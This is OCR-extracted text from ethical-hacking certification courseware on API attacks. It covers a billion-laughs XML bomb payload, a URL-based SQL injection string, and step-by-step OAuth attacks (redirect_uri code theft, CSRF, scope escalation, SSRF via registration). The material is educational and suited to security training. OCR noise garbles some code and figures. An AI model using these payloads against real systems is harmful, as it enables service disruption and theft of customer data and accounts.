"&lol4 ; &lol4 ; &1014; &1014 ;&lol4 ; &l ol4; &lol4 ; &1014 ;&l o l4 ; &lol4; ">
<! ENTITY lol6
"&lolS ; &lolS; &lolS ; &lolS ;&lol 5; &lol5; &1015; &1015 ;&1 0 1 5; &1015; ">
< !ENTITY 1017
"&1016 ; &10 16; &10 16 ; &1016 ;&101 6; &10 16; &1016; &l0l 6 ; &l0l6; &1016; ">
<!ENTITY 1018
"&1017 ; &1017; &1017; &1017 ;&101 7; &1017; &1017; &1017 ; &1017; &1017; ">
<!ENT ITY 1019
"&1 0 1 8 ; &10 1 8 ; &10 18 ; &1018 ;&101 8 ; &10 1 8; &1018; &101 8 ; &1018; &1018; ">

parties who are trying to access the API J>

< l 0lz>&l019 ;</l 0 lz>

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Injection Attacks
Similar to traditional web applications, APls are also vulnerable to various injection attacks

For example, consider the following normal URL:

http://billpay.com/api/vl/cust/459

The API retrieves the customer details based on the customer ID 459 from the database

" SELECT* FROM Customers where custID=' 459 '"

In the above URL, if an attacker injects malicious input, as shown below:

http://billpay.com/api/vl/cust/ ' %20or%20'1'='1

The resultant malicious SQL query is

" SELECT * FROM Customers where custID='' or ' 1 ' = '1' "

The above query returns the details of all customers in the database

Using this information, an attacker may further delete or modify the data in the database or use customer
information to perform other malicious activities on the database server

Note: Web APls are also vulnerable to XSS and CSRF attacks

COpynght Cl by EC-C1uncil All Rights Reserved Reproduction IS Strictly Proh1b1ted

Module 14 Page 2105 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Exploiting Insecure Configurations

8 Vulnerabilities in SSL configuration may allow attackers to perform man-in-the-middle (MITM)

Insecure SSL attacks
Configuration 8 An attacker may sniff the traffic between an API and a client, manipulate the client-side certificate,
and start monitoring or manipulating the encrypted t raffic between the client and the API

8 Direct object references are used as arguments for API calls, and access rights are not imposed on
Insecure Direct the objects for whic h a user does not have access
Object
8 These vulnerabilities can be identified through API metadata and can be exploited by attackers to
References
(IDOR) identify parameters and try all possible values for the parameters to access data for which the user
does not have access

Insecure Session/ 8 Vulnerabilities such as the reuse of session tokens, sequential session tokens, long session token
Authentication timeout, unencrypted session token, and session tokens embedded in a URL allow attackers t o
Handling hijack the client session and stea l or manipulate the messages between the cl ient and the API

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Login/Credential Stuffing Attacks

Attackers employ login attacks or credential stuffing attacks to exploit password reuse across multiple platforms

Credential stuffing attacks do not perform password guessing or brute-forcing of passwords - inst ead, attackers
try to automate all the earlier identified pairs of credentials using automated tools such as Sentry MBA and
Pha ntomJS to brea k into a n account

Login l
0 0
r ■:=7
, ···············l>- ~ ···············l>-

-
1 4
l ogin 2
0 0
···············l>- l=- ~1............... l>- ■
■
2 5
Attacke r
l ogin 3
0 0

···············l>-1=- J-..········..··l>-
3 6
Bots Victim's
Collection of Stolen Web Services
Credentials

!{ Copynght CJ by lC-CIUOCII All Rights Reserved Reproduction IS Strictly Proh1b1ted

Module 14 Page 2106 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

API DDoS Attacks

The DDoS attack involves saturating an API with a huge volume of traffic from multiple infected computers
(botnet) to delay API services to legitimate users

Attackers often carry out these attacks by using botnets that are created to discover and stay within an API
rate limit control to increase the potentiality of an attack

Bots connect to C&C

I •l~...............~~.~~~~'..~~.~~'.~~?:'.'.~~'.':'~~'.'.".'.~.......9 ... lil! - Ii] r."3

II •I
•I.......9 ....~~~;~;·;;;~~;·;;,;,;;;;;;,;;;~~~;;.;............. lilfi Ii] . lil!
i> Bots attack ~
Bot Command and bots through c&c ··O ······'··'!:~~~~........>~
Control Center
A ~ Ii] API
0 Botnet Gateway
: Sets a bot
~ C&C handler
a.
t: Bot looks for other vulnerable
t-;;:: -.,J : systems and infects them to

······• ···························~
Attacker infects
.............9 ............ ] create Botnet

• machine Victim (Bot)

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Authorization Attacks on API: OAuth Attacks

OAuth is an authorization protocol that allows a user to grant limited access to their resources on a site to a different site
without having to expose their credentials

OAuth Attacks

l
Attack on
'Connect'
Request
8
8

e
Majority sites enable users to access other websites such as Linkedln, lnstagram, and Twittervia Oauth
An attacker can exploit requests made to connect one site to another to gain illegal access t o a victim's account

Domain is usually specified by the client and only those ' redirect_uri' on the specific domain are permitted
J
Attack on
'redirect_uri'

CSRFon
e

8
If an attacker is able to identify vulnerabilities in a web page on the client domain, he can exploit them to capture
authorization codes

Attackers perform CSRF attacks to connect a fake account on the provider w ith the v ictim's account on client side
J
Authorization
Response e This attack explo its a third request related to t he granting of an authorization code

Access e OAuth requires unique access tokens for individual clients

Token I! An access token provided for one 'Cl ientA' can work for another 'ClientB'. Attackers exploit this f eature to perform
Reusage attacks on clients that allow access to be granted implicitly

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Module 14 Page 2107 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Authorization Attacks on API: OAuth Attacks (Cont'd)

SSRFUsing
Dynamic Client e Hidden URLs are used for specia l registration endpoints and are mapped to /register
Registration e Attackers can perform an SSRF attack using t hese UR Ls assoc iated wit h the paramet ers in the POST request
Endpoint

e WebFinger is a st andard protocol used to displ ay al l user information through aGET request
WebFinger User
Enumeration e Attackers can use " anonymous" as t he username to validate themselves as a genuine user account on t he
server using OAuth authorizat ion wit h " / . well-known/ webfinger," which val idates an endpoint

e Attackers exploit the vulnerabilities of OAuth service providers to achieve scope escalation , w hich results in
Exploiting the exf iltration of additional data of t he resource owner
Flawed Scope
Validation e If attackers can modify the scope parameter in t he authorization request of an access token, they can lure
the OAuth service provi ders using flawed scopes to gain additional scope access

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Launch Attacks
After identifying the target API, analyzing the message formats and security standards, and
identifying the attack surface, attackers perform various attacks on the target API to steal
sensitive information such as credit card details and credentials.
Various attacks performed on APls are discussed below:
■ Fuzzing

Attackers use the fuzzing technique to repeatedly send some random input to the target
API to generate error messages that reveal critical information. To perform fuzzing,
attackers use automated scripts that send numerous requests with varying
combinations of input parameters. Attackers use tools such as Fuzzapi to perform
fuzzing on the target API.
■ Invalid Input Attacks

In some scenarios, fuzzing is difficult to perform due to its structure. In such cases,
attackers will give invalid inputs to the API, such as sending text in place of numbers,
sending numbers in place of text, sending a greater number of ch aracters than
expected, and sending null characters, etc., to extract sensitive information from
unexpected system behavior and error messages. At the same time, attackers also
manipulate the HTTP headers and values targeting both API logic and the HTTP protocol.
■ Malicious Input Attacks

In the attack discu ssed above, attackers try to retrieve sensitive information from
unexpected system behavior or error messages. A more dangerou s attack is wh ere th e
attackers inject malicious input directly to target both the API and its hosting

Module 14 Page 2108 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

infrastructure. To perform this attack, attackers employ malicious message parsers using
XML.
The following code snippet illustrates an XML bomb attack:
<?xml version="l.0" encoding="utf-8 ?> 11

<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY loll 11
&lol;&lol;&lol;&lol;&lol;&lol;&lol ; &lol;&lol;&lol; 11 >
<!ENTITY lol2
"&loll;&loll;&loll;&loll ; &loll;&loll;&loll;&loll;&loll;&loll;">
<!ENTITY lol3
11
&lol2;&1ol2;&lol2;&1ol2 ; &1ol2;&1ol2;&1ol2;&1ol2;&1ol2;&1ol2; 11 >
<!ENTITY lol4
11
&lol3;&lol3;&lol3;&1ol3 ; &1ol3;&1ol3;&1ol3;&1ol3;&1ol3;&1ol3; 11 >
<!ENTITY lolS
"&lol4;&lol4;&lol4;&lol4;&1ol4;&1ol4;&1ol4;&1ol4;&1ol4;&1ol4;">
<!ENTITY lol6
"&lol5;&lol5;&lol5;&lol5;&1ol5;&1ol5;&1ol5;&lol5;&lol5;&1ol5;">
<!ENTITY lol7
11
&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6; 11 >
<!ENTITY lol8
11
&lol7 ; &lol7;&lol7;&1ol7;&1ol7;&1ol7;&1ol7;&1ol7;&1ol7;&1ol7 ; 11 >
<!ENTITY lol9
11
&lol8 ; &lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8 ; &lol8;&lol8 ; 11 >
]>
<lolz>&lol9;</lolz>

When the abovementioned code is processed by a vulnerable or misconfigured XML

parser, it will try to expand the lol9 entity, resulting in a memory-out-of-bound error.
This either brings the target server totally down or makes it vulnerable to further
attacks.
Another way in which attackers perform this attack is by uploading malicious script files,
e.g., by uploading shell script instead of the pdf document. This may result in executing
the malicious script to bypass the security mechanisms on the server or propagating the
script to other parties who are trying to access the API. Using this technique attackers,
try to extract information related to the underlying filesystem.
• Injection Attacks

Similar to traditional web applications, APls are also vulnerable to various injection
attacks. For example, consider the following normal URL:
http://billpay.com/api/vl/cust/459

For the abovementioned URL, the API retrieves the customer details based on the
customer ID 459 from the database using the following SQL query:
"SELECT* FROM Customers where custID=' " + custID + "' "

Module 14 Page 2109 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Here, the custlD is replaced with 459

"SELECT* FROM Customers where custID='459'"

In the abovementioned URL, assume that an attacker injects the malicious input
http://billpay.com/api/vl/cust/ '%20or%20'1'='1

The resultant malicious SQL query is

"SELECT* FROM Customers where custID='' or '1' = '1'"

The abovementioned query returns details of all the customers in the database. Using
this information, an attacker may further delete or modify the data in the database or
use the customers' information to perform other malicious activities on the database
server.
These API injection attacks are performed not only using SQL but also using JSON,
JavaScript, XPath, XSLT, etc., which require parsers/processors for execution.
Note: Similar to injection attacks, web APls are also vulnerable to XSS and CSRF attacks

■ Exploiting Insecure Configurations

o Insecure SSL Configuration: Vulnerabilities in SSL configuration may allow attackers

to perform MITM attacks. For example, using self-signed SSL certificates for secure
API access may allow attackers to perform an MITM attack. An attacker may sniff the
traffic between an API and a client, manipulate the client-side certificate, and start
monitoring or manipulating the encrypted traffic between the client and the API.
o Insecure Direct Object References (IDOR) : In general, direct object references are
used as arguments for API calls, and access rights are not imposed on the objects for
which a user does not have access. These vulnerabilities can be identified through
API metadata and exploited by attackers to identify the parameters and try all
possible values for the parameters to access the data to which the user does not
have access.
o Insecure Session/Authentication Handling: Vulnerabilities such as the reuse of
session tokens, sequential session tokens, long session token timeout, unencrypted
session token, and session token embedded into a URL, allow attackers to hijack and
take over the client session and steal or manipulate the messages between the
client and the API.
■ Login/Credential Stuffing Attacks

Attackers often target login and validating systems because attacks on these systems
are difficult to detect and stop using typical API security solutions. Attackers perform
login attacks or credential stuffing attacks to exploit password reuse across multiple
platforms. Most users use the same passwords to access different web services.
Attackers can take advantage of credentials stolen from one account and use them to
validate other services.

Module 14 Page 2110 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Credential stuffing attacks do not involve password guessing or brute-forcing the

passwords; instead, attackers try to automate all the previously identified pairs of
credentials using automated tools such as Sentry MBA and PhantomJS, to break into an
account. These attacks can also be performed to disrupt APl-based services by
preventing valid users from signing in, thereby degrading the user experience and
functionality of the front-facing AP ls.
Attackers generally employ bots for different login attempts using the previously stolen
data (collected from previous logins) or leaked information belonging to one account to
breach other accounts/services or bombard the server with a large set of login requests
until the right combination hits. Once the attack is successful, attackers not only take
control of the user account but also perform illegitimate transactions from the account
and conduct fraudulent on line campaigns.

Login 1
oJ. o J.
,. ,. ..............> 1 . ....-... 1..............>

..a. 1

o J.
4

OJ.
Login 2

>§ .............. >

.-
•
■
I ...................... ,. ,. ■ ■ ■ ■ ■ ■• ■ ■ ■ ■ ■ ■ • • JMISswonl lt
■
2 5
Attacker
Login 3
oJ. o J.
,. ,. ··············> § ············ ···►
• p,mword lt

3 6
Bots Victim's
Collection of Stolen Web Services
Credentials

Figure 14.94: Illustration of credential stuffing attack

■ API DDoS Attacks

The DDoS attack involves saturating an API with a massive volume of traffic from
multiple infected computers (botnet) to delay the API services to legitimate users.
Although many rate limit constraints are implemented to protect the server against
crashing, they may not prevent the service delay (API response), thereby degrading the
APl's user experience.
Attackers often carry out these attacks using botnets that are created to discover and
stay within the API rate limit control to increase the possibility of an attack. Along with
the regular traffic from legitimate users, attackers' requests can also bypass API security
management systems, load balancers, and other security implementations.
Most of these attacks may not be volumetric. They may also exploit certain API
vulnerabilities to disrupt the API services. For instance, an attacker who gains access to
the API can consume the CPU and other memory resources reserved for the API to delay
the service for as long as possible.

Module 14 Page 2111 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

Bots connect t o C&C

I •I~··············~~~.~l~~~.~~.~~i.t.~~'.!~~~~~.<_l!?~.~......9 .. [i];. - [i]~

I •I
I •I······9·--·~~;~~k~;;~~d;·;~;,;;,;~~d:·t~;i,·~ ············➔ [i]fi [i] [i];.
Bot Command and bots t h rough C&C
Control Center
A [i] ~ [i]: [i] API
0: Sets a bot
Botnet

~
Gateway

: C&C handler
: Bot looks for other vulnerable
~ systems and infects them to

······9 ··········· ···············►

••• ••••• •• • : create Botnet
Attacker infects
a machine
Victim (Bot)

Figure 14.95: Illustrat ion of API DDoS attack

■ Authorization Attacks on API: OAuth Attacks

According to https;//authO.com, OAuth is an authorization protocol that allows a user to

grant limited access to his/her resources on one site to another site without having to
expose his/her credentials.
OAuth grants authorization flows for many computing devices and applications, such as
connecting users to different applications from one application to access the required
information.
Different actors involved in the OAuth process:

o Owner of the resource: The resource owner is also known as a user who grants
permission to an application to access his/her account. The access to the application
is limited or conditional, such as providing only read and write permissions.
o Authorization/Resource Server (API): The resource server provides the secured user
account, and the authorization server validates the user identity and then supplies
the access token to the application.
o Client or Application: It is an application that seeks access to the user account. To
access the account, the user must authorize th e application; then, the API should
validate the authorization.
Steps involved in Authorization Code Grant

There are four steps involved in th e authorization code grant, through which attackers
can perform various authorization attacks on the API.
o The user passes the GET request to the client via the user agent to initiate the
authorization process. This operation can be performed vi a the "Login with or
Connect" button displayed on the client's site.
o The user agent can be redirected to the authorization server by the client using the
following parameters:
• response _type: Code used for informing th e server which permissions to
execute

Module 14 Page 2112 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

• client_id: ID assigned to the client

• redirect_uri : URI where the authorization server redirects the user agent when
the authorization code is provided

• scope: Defines the level of access to the application

• State: Opaque value used for security implementations. The value is also used
for maintaining the state between request and callback
o When the user is authenticated and authorized to access the resource, the user
agent is redirected to redirect_uri by the authorization server. The server uses the
following parameters to do this:

• Code: Authorization code

• State: Value supplied in the abovementioned request

o Using the authorization code, the client requests the access token by adding the
following parameters in the body of a request:

• grant_type: Authorization_code

• code: Authorization code received in the previous message

• redirect_uri: URI used in the first request

OAuth Attacks

Various attacks on OAuth performed by manipulating the requests stated above are
described below:

o Attack on 'Connect' Request

Most sites enable users to access other websites such as Linkedln, lnstagram, and
Twitter, via OAuth. An attacker can exploit requests to connect one site to another,
i.e., when the user hits the "Login with or Connect" button. Then, he or she can gain
illegal access to the client-side user/victim's account by connecting his/her account
to the provider's website.
Steps to perform an attack on "Connect" request:

• The attacker opens a fake account on the provider' s website

• The attacker initiates the " Connect" operation with the client through his/her
fake account on the provider's website but halts authorization server redirects,
which means that the attacker validates the client to access his/her resources on
the provider, while the client is not informed.

• The attacker creates a malicious web page as follows:

✓ Uses CSRF to make the user logout on the provider.

✓ Again uses CSRF to make the user login on the provider using his/her fake
account credentials.

Module 14 Page 2113 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

✓ Spoofs the first request to connect the provider account with the client. It is
just another GET request. It is usually performed inside the <iframe> tag to
make the user unaware of this action.

• Once the victim opens the attacker's malicious page, his/her account gets logged
out on the provider and connects as a fake account. Then, the attacker's fake
account is connected with the victim's account on the client. The victim does not
ask the client for permission, as the attacker has already approved it.
• Hence, the attacker can log into the victim's account on the client side using
his/her fake account on the provider.
o Attack on 'redirect_uri'

While registering, the domain is usually specified by the client and only those
"redirect_uri" on the specific domain are permitted. If an attacker can identify
vulnerabilities such as XSS on a web page on the client domain, he/she can exploit
them to capture authorization code.
Steps to perform an attack on 'redirect_uri':

• The attacker leaks data through a vulnerable page on the client domain:
https://xyz.com/vuln

• The attacker installs malicious JavaScript on the page; then, the page sends the
URL, which is loaded in the browser (along with the parameter and fragments) to
the attacker

• The attacker creates a page that prompts the user to open a malicious link:

• https://provider.com/oauth/authorize?client_id=CLIENTID&response_type=au
th_code&redirect_uri=https%3A%2F%2Ffanyv88.com%3A443%2Fhttps%2Fxyz.com%2Fvuln

• When the victim opens the malicious link, the user agent is redirected to
https://xyz.com/vuln?code=CODE, and the CODE is then exfiltrated to the
attacker

• Now, the attacker uses the retrieved code to provide the access token via
authentic ' redirect_uri' such as https://xyz.com/oauth/callback?code=CODE.
o CSRF on Authorization Response

The attacker performs a CSRF attack to connect a fake account on the provider with
the victim's account on the client side. This attack exploits a third request related to
authorization code grant.
Steps to perform CSRF on authorization response:

• The attacker open a fake account on the provider

• The attacker starts a "Connect" operation with the client through his/her fake
account on the provider, but halts authorization server redirects, which means
that the attacker has validated the client to access his/her resources on the

Module 14 Page 2114 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

provider, while the client is not informed. Hence, the attacker stores the
authorization code.

• The attacker persuades the user to

send a request to
https://xyz.com/<provider>/login?code=Auth_Code. This operation can be
implemented by luring the victim into opening a malicious link embedded with
an img or script tag along with the abovementioned link as source.
• When the victim logs into the client, the attacker's fake account is connected to
the victim's account

• Now, the attacker can sign in as the victim on the client by logging in with his/her
fake account on the provider
o Access Token Reusage

OAuth requires unique access tokens for individual clients. It ensures that these
tokens saved on the authorization server are mapped to relevant scopes and time
expiry. Access tokens provided for "ClientA" can work for "ClientB". Attackers exploit
this feature to perform attacks on clients that allow grants implicitly.
Steps to reuse access tokens:

• The attacker develops a legitimate client application "clientA" and enrolls it with
some provider

• Now, the attacker lures the victim into accessing "clientA" and gains illegal
access to the victim's access token on "clientA"

• Let us consider that the victim accesses "client", which uses the implicit grant. In
such a case, the authorization server redirects the user agent to
https://clientB.com/callback#access_token=ACCESSTOKEN. Now, the attacker
can open this URL with client's access_token.

• The attacker is verified as a valid entity by "client". Therefore, one access token
is sufficient for use on many clients using the implicit grant.
o SSRF Using Dynamic Client Registration Endpoint

In black-box testing on an OAuth server, the analysis may not detect hidden URLs
such as the Dynamic Client Registration endpoint. These URLs are used as special
registration endpoints and are mapped to /register. The attacker can perform an
SSRF attack using these URLs associated with the parameters, as demonstrated in
the following POST request:
POST /connect/register HTTP/1.1
Content-Type : application/json
Host: server.certifiedhacker.com
Authorization: Bearer eyJhbGciOiJSUzI1NiJ9.eyJ
{

Module 14 Page 2115 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

"application_type": "web app",

"redirect uris":
[
11
https://client.certifiedhacker.com/callback 11 ] ,
"client_name": "Sample Test",
"logo_uri": "https://client.certifiedhacker.com/logo.png",
"subject_type": "pairwise",
"sector identifier uri":
"https://~ertifiedha~ker.com/rdrct_uris.json",
"token_endpoint_auth_method": "client_secret_basic",
"jwks_uri":
"https://client.certifiedhacker.com/public_keys.jwks",
"contacts": ["[email protected]"],
"request_uris":
["https://client.certifiedhacker . com/rf.txt"]
}

The above POST request has several URL references values that can trigger an SSRF
attack. The vulnerable parameters are logo_uri, jwks_uri, and request_uris.

• logo_uri: After registering a new user, the server authorizes an endpoint with
the new client_id and displays the logo using the logo_uri parameter. If
the server fetches the logo, an SSRF attack might occur.

• jwks_uri: The JWT key is important for the server to validate an endpoint
token client authentication. If the client application is registered with a malicious
URL in the jwks_uri parameter, an SSRF attack may occur; thus, the attacker
can obtain the authorization code for all the users.
• request_uris : This parameter contains an array of URLs that are used while
authorizing an endpoint. The URL contains the requested information with a
JWT. It is possible to perform an SSRF attack by using the request_uri
parameter.
o WebFinger User Enumeration

WebFinger is a standard protocol used to display all user information through a GET
request. In OAuth authorization, "/. well-known/webfinger" validates an
endpoint with a username that does not exist in the server. The attacker can use
"anonymous" as a username to validate themselves as a genuine user account on
the server. As the account is not found or used by the OpenlD client application, we
can determine that the request does not originate from the browser side. Hence,
the response from the server contains a valid URL in the form of
"http:/ /host/user" in place of the rel parameter value.

Module 14 Page 2116 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

o Exploiting Flawed Scope Validation

Attackers exploit vulnerabilities of OAuth service providers to achieve scope

escalation, which results in the exfiltration of additional data of the resource owner.
If an attacker can find a way to modify the scope parameter in the authorization
request of an access token, they can lure the OAuth service providers using flawed
scopes to gain additional scope access. This scope parameter helps in providing
scope for access to the client application, which is either defined dynamically by the
client or by using scope standard entities such as OpenlD Connect.

Steps to Exploit Flawed Scope Validation

Attackers use different grant types to exploit flawed scope validation. The following
are the two grant types used by attackers during the attack.

• Authorization code grant type:

✓ The attacker registers for the OAuth service that is used by the targeted
resource owner for their malicious client application https: / /xyz. com.
✓ When the victim attempts to open the attacker's malicious client application,
the attacker initiates a request to the OAuth service provider for access to
the client's mail address using the OpenlD email scope.

✓ When the user provides authorization for their request, the attacker attains
an authorization code as a response.
✓ Now, the attacker initiates the scope escalation process for the targeted
client by controlling their malicious client application to add additional scope
client id=12345&client secret=SECRET&redirect uri=https : /
/xyz.c~m/callback&grant_type=authorization_code&code=alb2
c3d4e5f6g7h8&scope=openid%20 email%20profile.

✓ After approval from the OAuth server, the attacker attains a new access
token containing the newly added additional scope:
"access_token" : "z0y9x8w7v6u5",
"token_type":"Bearer",
"expires_in":3600,
"scope": "openid email profile",
✓ Now, the attacker attains a valid access token to access and pocket
additional data by using the escalated scope to make usual API calls to the
client.

• Implicit grant type:

✓ The attacker targets a vulnerable client application that utilizes an implicit

grant-type process to attain access tokens from its clients through an open
browser.
https://xyz.com/vuln

Module 14 Page 2117 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

✓ When the targeted client application obtains approval from its client and the
corresponding access token is generated, the attacker attempts to pocket it.
✓ After attaining the access token from the targeted client application, the
attacker initiates a new request to its corresponding OAuth service provider
with an altered scope /userinfo.
✓ As the client has already granted permission for data access to the targeted
client application, the attacker is now able to access additional information
from the user until the OAuth server verifies and validates the scope
parameter.

Module 14 Page 2118 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Other Techniques to Hack an API

Reverse Attackers invoke A Pis in the reverse order to identify flaws residing in the API that can be
Engineering obfuscated in real-time usage

Attackers masquerade as a trusted user to perfor m various attacks such as privilege escalation by
User
redirecting the URI function to another URls, injecting code t hat serves as text, or bombarding the
Spooimg API with excessive data t o cause buffer overflow

Man-in-the- Attackers perform M ITM att acks using domain squatting and copying API resource locations to
Middle Attacks provide fake links that appear to be legitimate in API interactions

Session Replay Attackers perform session replay to rewind the session time and prompt the server to disclose
Attacks information as though a similar request is made a second time

Social engineering techniques do not target the API or machine code, and are instead employed
Social
to trick users into divulging their credentials or ot her sensitive information t o perform further
Engineering
attacks

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Other Techniques to Hack an API

Different ways to hack an API are discussed below:
■ Reverse Engineering
Viewing the APls from the developer's viewpoint can be flawed because it checks only if
an API is working as intended. Once it is deployed for the end-user experience, it may
not work as it worked in the developer environment. This is what attackers often
attempt to do while reverse-engineering the API. Attackers invoke APls in reverse order
to identify the flaws residing in the API that can be obfuscated in real-time usage.
For instance, consider an order is made using the same account that is already used for
an earlier booking. The order flow appears to be something like this :
o Order made
o Order linked with the account
o Order is accepted
Attackers can use this flow in the process of reverse engineering an API. If the accepting
mechanism is carried in the reverse order, the internal API used to connect orders to
accounts can be crashed, thereby forcing the browser to expose the account details of a
user.
■ User Spoofing
It is a process of concealing the original identity and masquerading as some other valid
entity. In most cases, th e attacker tries to expose himself as a legitimate user with
special privileges and provides free data access to additional users to cause more

Module 14 Page 2119 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

damage. Attackers use details obtained from phishing or any other information leaking
methods to masquerade as the original user.
If attackers can successfully break into the system, they can perform some type of
privilege escalation attack by redirecting the URI function to another URI, injecting code
that serves as text, or bombarding the API with excessive data, causing buffer overflow.
■ Man-in-the-Middle Attacks

In an MITM attack, attackers watch the API communications with the server or behave
themselves as a server by intercepting the request calls. The attacker's motive, in this
case, is to provide fake links that appear to be legitimate in API interaction. These
attacks can be carried out by domain squatting and copying API resource location.
For instance, the user might make a resource call via the APl.io/media/function, and the
attacker might be sitting at the APO.io/media/function. A change in a single character
can make a significant difference. If the user clicks on the second link without noticing
the URL misinterpretation, he/she will be providing sensitive information to an attacker-
controlled server.
■ Session Replay Attacks

Session replay attacks can be launched on websites and other sources that initiate and
store sessions. These attacks are usually performed to obtain session IDs and replay
them to the server. In this case, attackers rewind the session time and prompt the
server to disclose the information as though a similar request is made once again.
■ Social Engineering

Although it may not be a direct API attack, social engineering can be performed through
the API. Social engineering does not affect the API or the machine code; it is a technique
employed to trick users into divulging their credentials or other sensitive information.
Phishing is a technique often used to send malicious links to users via email to reset or
validate their security credentials. Spear-phishing is another sophisticated social
engineering attack in which additional data is provided to the users, making th em
believe that they are interacting with a valid endpoint.
If the user enters his/her credentials on the fake link, attackers can capture the data and
launch further attacks such as modifying the account details and illegitimate online
transactions, using the stolen credentials.

Module 14 Page 2120 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

REST API Vulnerability Scanning

REST API v ulnerabilities introduce risks th at Astra allows attackers to detect REST APls t hat are vulnera bl e to
are similar to web applicatio ns, su ch as
critical data theft and intermediate data
tampering
Astra
I attacks such as XSS, SQL inj ect ion, information leakage, CSRF,
Broken aut hentication, and sessi on management

-·-
+. c (i) 1n.o.cu ..
Perfor ming thorough sca nning on REST A Pis
can expose variou s underlying v ulnerabilities
that attackers can expl o it

Attackers can use too ls such as Astra to carry

out REST API v ulnerability sca nning
.._..1_ _ N

("'1fOl1•f- -\l<ttlWJ- =;.":'::u--c,_o_.lt , ,,,,.

REST APIVulnerahility Scanning Tools _,,..u, I •1t•, fletlKMIUH•.~
~-=~:1:-!!..,.~ltl• ! •

C-•H•-tl• NI

8 Fuzzapi (https://github.com ) ~-:~'~rJ: :.:1:~1;.;~~:·:·..

"-Atiwe 1 t l - l A , , ....t ..
~ ...,,....-,.,2....
nu.... i l...,-"l/J.2.,_,i,_._,.
.:.-.-.,.,-/\.1.•
8 W3af (https://w3afarg)

8 apps pider (https:j/www. rapidl.cam)

8 Vooki (https://www.vegabird.com )

8 OWASP ZAP (https:j/www.zaproxy.org) https://github.com

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

REST API Vulnerability Scanning

REST API vulnerabilities introduce the same risks as security issues in web applications and
websites. These risks include critical data theft, intermediate data tampering, etc. Performing
thorough scanning on REST APls can expose various underlying vulnerabilities that attackers can
exploit. Attackers can use tools such as Astra, Fuzzapi, W3af, and Appspider to carry out REST
API vulnerability scanning.
• Astra

Source: https://github.com
Attackers use the Astra tool to detect and exploit underlying vulnerabilities in a REST
API. Astra can discover and test authentications such login and logout; this feature
makes it easy for attackers to incorporate it into the CICD pipeline. Astra can invoke API
collection as an input value; hence, it can also be used for scanning REST APls.
